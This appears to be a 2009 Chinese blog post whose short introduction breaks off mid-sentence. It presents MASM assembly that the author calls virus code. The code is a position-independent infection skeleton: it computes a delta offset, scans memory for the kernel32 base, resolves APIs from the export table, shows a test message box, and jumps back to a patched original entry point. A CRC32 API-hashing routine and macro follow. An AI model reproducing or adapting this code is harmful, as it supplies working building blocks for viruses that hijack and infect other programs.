很多朋友说我写的那些病毒编译链接的时候对于 mov dword ptr [ebp+aa],eax这样的语句提示内存访问错误,还有的说masm写病毒的话,很多时候把
aa proc
aa enp
;;author:charme ;;date:2009.12.12 ;;index:http://hi.baidu.com/charme000 ;;ml /nologo /coff /c charme.asm ;;link /subsystem:windows /section:.text,RW charme.obj .586 .model flat,stdcall option casemap:none .code start: pushad pushfd call aa aa: pop ebp sub ebp,offset aa mov eax,DWORD ptr [ebp+offset _ret] mov DWORD ptr [ebp+offset _where],eax mov esi,DWORD ptr [esp + 24h] call get_kernel_image_base call find_main_apis call find_extra_apis mov eax,offset szCharme add eax,ebp push 0 push eax push eax push 0 call [ebp+AMessageBoxA] jmp _exit szCharme db 'success',0 _where dd 0 find_extra_apis: jmp load_ user32 db "user32.dll",0 SMessageBoxA db "MessageBoxA",0 AMessageBoxA dd 0 load_: mov eax,offset user32 add eax,ebp push eax call [ebp + offset AGetModuleHandleA] cmp eax,0h jne load_message_box mov eax,offset user32 add eax,ebp push eax call [ebp + offset ALoadLibraryA] cmp eax,0 je _exit load_message_box: mov ebx,offset SMessageBoxA add ebx,ebp push ebx push eax ; user32.dll call [ebp + offset AGetProcAddress] cmp eax,0h je _exit mov dword ptr [ebp + offset AMessageBoxA],eax ret ;---------------------------------------------------------------------------------------------------------------------- get_kernel_image_base: mov ecx,esi jmp start_getting k32 dd 0 start_getting: cmp dword ptr [esi],'NREK' je found_kernel_str dec esi loop start_getting mov eax,0 ret found_kernel_str: cmp word ptr [esi],'ZM' je return_ dec esi loop found_kernel_str mov eax,0 ret return_: mov dword ptr [ebp + offset k32],esi cmp esi,0 je _exit ret ;------------ find_main_apis: jmp get_kernel_pe_header k32_export_table dd 0 ;VA k32_name_table dd 0 ;VA k32_name_counter dd 0 next_api_string dd 0 current_api_string dd 0 str_size dd 0 api_address_counter dd 0 api_strings: SExitProcess db "ExitProcess",0 SGetProcAddress db "GetProcAddress",0 SGetModuleHandleA db "GetModuleHandleA",0 SLoadLibraryA db "LoadLibraryA",0 dd 00000090h api_addresses: AExitProcess dd 0 AGetProcAddress dd 0 AGetModuleHandleA dd 0 ALoadLibraryA dd 0 get_kernel_pe_header: mov esi,dword ptr [ebp + offset k32] add esi,dword ptr [esi + 3Ch] ; PE header VA mov esi,dword ptr [esi + 78h] ; export table RVA add esi,dword ptr [ebp + offset k32] ;VA mov dword ptr [ebp + offset k32_export_table],esi add esi,32d ; address of names RVA in export table mov esi,dword ptr [esi] add esi, dword ptr [ebp + offset k32] ; starting of dword array of function names in k32 mov dword ptr [ebp + offset k32_name_table],esi ;start next_api_string mov dword ptr [ebp + offset next_api_string],offset api_strings add dword ptr [ebp + offset next_api_string],ebp api_loop: mov esi,dword ptr [ebp + offset next_api_string] cmp dword ptr [esi],00000090h je all_found ;get a string from api_strings label mov dword ptr [ebp + offset k32_name_counter],0h ;reset name counter mov esi,dword ptr [ebp + offset next_api_string] xor ecx,ecx mov dword ptr [ebp + offset current_api_string],esi @@: cmp byte ptr [esi],0h je @F inc ecx inc esi jmp @B @@: mov dword ptr [ebp + offset str_size],ecx inc esi mov dword ptr [ebp + offset next_api_string],esi ; next str get_name_from_k32: ;get a name and normalize it mov eax,dword ptr [ebp + offset k32_name_counter] mov ebx,4h mul ebx add eax,dword ptr [ebp + offset k32_name_table] mov eax,dword ptr [eax] add eax,dword ptr [ebp + offset k32] ; now we have an api name add dword ptr [ebp + offset k32_name_counter],1h ; increment for next compare_two_names: mov ecx,dword ptr [ebp + offset str_size] mov edi,eax ; api name in k32 name table mov esi,dword ptr [ebp + offset current_api_string] @@:cmpsb jne @F loop @B ;we have found it so calculate ordinal jmp calc_ordinal @@: ;not the same api jmp get_name_from_k32 calc_ordinal: sub dword ptr [ebp + offset k32_name_counter],1h ; current names ordinal pos mov ebx,2 mov eax,dword ptr [ebp + offset k32_name_counter] mul ebx mov esi,dword ptr [ebp + offset k32_export_table] add esi,36d mov esi,dword ptr [esi] add esi,dword ptr [ebp + offset k32] ; ordinal table add esi,eax ; ordinal of our api movzx eax,word ptr [esi] ; ordinal of our api mov esi,dword ptr [ebp + offset k32_export_table] add esi,28d mov esi,dword ptr [esi] add esi,dword ptr [ebp + offset k32] ; address table mov ebx,4h mul ebx add esi,eax mov esi,dword ptr [esi] add esi,dword ptr [ebp + offset k32] mov eax,dword ptr [ebp + offset api_address_counter] mov dword ptr [ebp + offset api_addresses + eax],esi add dword ptr [ebp + offset api_address_counter],4h jmp api_loop all_found: mov dword ptr [ebp + offset api_address_counter],0 ret _exit: mov eax,DWORD ptr [ebp+offset _where] mov DWORD ptr [ebp+offset _ret +3h],eax cmp ebp,0 jne _ret push 0 call [ebp+offset AExitProcess] _ret: popfd popad db 68h,0,0,0,0 ret end start
;----------------------------------------------------------------------------; ;int __fastcall crc32(char*); @crc32 proc push esi xchg eax,esi mov edx,mCRC32_init gCRC32_next_byte: lodsb or al,al ;end of name ? jz gCRC32_finish xor dl,al mov al,08h gCRC32_next_bit: shr edx,01h jnc gCRC32_no_change xor edx,mCRC32 gCRC32_no_change: dec al jnz gCRC32_next_bit jmp gCRC32_next_byte gCRC32_finish: xchg eax,edx ;CRC32 to EAX pop esi ret @crc32 endp
mCRC32 equ 0C1A7F39Ah mCRC32_init equ 09C3B248Eh crc32m macro string crcReg = mCRC32_init irpc _x,<string> ctrlByte = '&_x&' xor (crcReg and 0FFh) crcReg = crcReg shr 8 rept 8 ctrlByte = (ctrlByte shr 1) xor (mCRC32 * (ctrlByte and 1)) endm crcReg = crcReg xor ctrlByte endm dd crcReg endm